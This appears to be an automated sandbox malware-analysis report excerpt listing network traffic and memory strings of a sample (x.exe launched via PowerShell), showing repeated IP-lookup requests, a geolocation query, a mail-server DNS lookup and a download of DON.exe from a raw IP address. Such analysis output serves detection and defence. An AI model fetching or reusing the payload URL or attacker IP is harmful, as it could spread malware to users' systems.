                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.11:49709 version: TLS 1.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownTCP traffic detected without corresponding DNS query: 176.65.144.3
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /dev/DON.exe HTTP/1.1Host: 176.65.144.3Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                      Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                      Source: global trafficDNS traffic detected: DNS query: mail.tsengg.com
                      Source: x.exe, 00000004.00000002.1133468244.0000000002B6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3
                      Source: x.exe, 00000004.00000002.1133468244.0000000002B09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/dev/DON.exe
                      Source: x.exe, 00000004.00000002.1133468244.0000000002B0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.65.144.3/dev/DON.exeP
                      Source: x.exe, 00000005.00000002.3555469132.0000000002D8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                      Source: x.exe, 00000005.00000002.3552935335.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000002.3555469132.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                      Source: x.exe, 00000005.00000002.3552935335.0000000000E78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/bYn
                      Source: x.exe, 00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000004.00000002.1134625680.0000000004329000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3552025074.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                      Source: powershell.exe, 00000000.00000002.1122082133.0000000007924000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                      Source: powershell.exe, 00000000.00000002.1122082133.0000000007924000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftbN
                      Source: svchost.exe, 00000006.00000002.2827368685.0000021EB5E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                      Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                      Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                      Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                      Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                      Source: qmgr.db.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                      Source: edb.log.6.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: x.exe, 00000005.00000002.3563748591.0000000008B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.0/1
                      Source: x.exe, 00000005.00000002.3563748591.0000000008B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c/r1
                      Source: x.exe, 00000005.00000002.3563748591.0000000008B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.microsoft.1.1
                      Source: powershell.exe, 00000000.00000002.1119056662.0000000006156000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000000.00000002.1116625210.0000000005246000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1121376913.000000000786E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: x.exe, 00000005.00000002.3555469132.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3561012005.0000000006280000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000002.3555469132.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3552935335.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000002.3555469132.0000000002D22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r10.i.lencr.org/0#
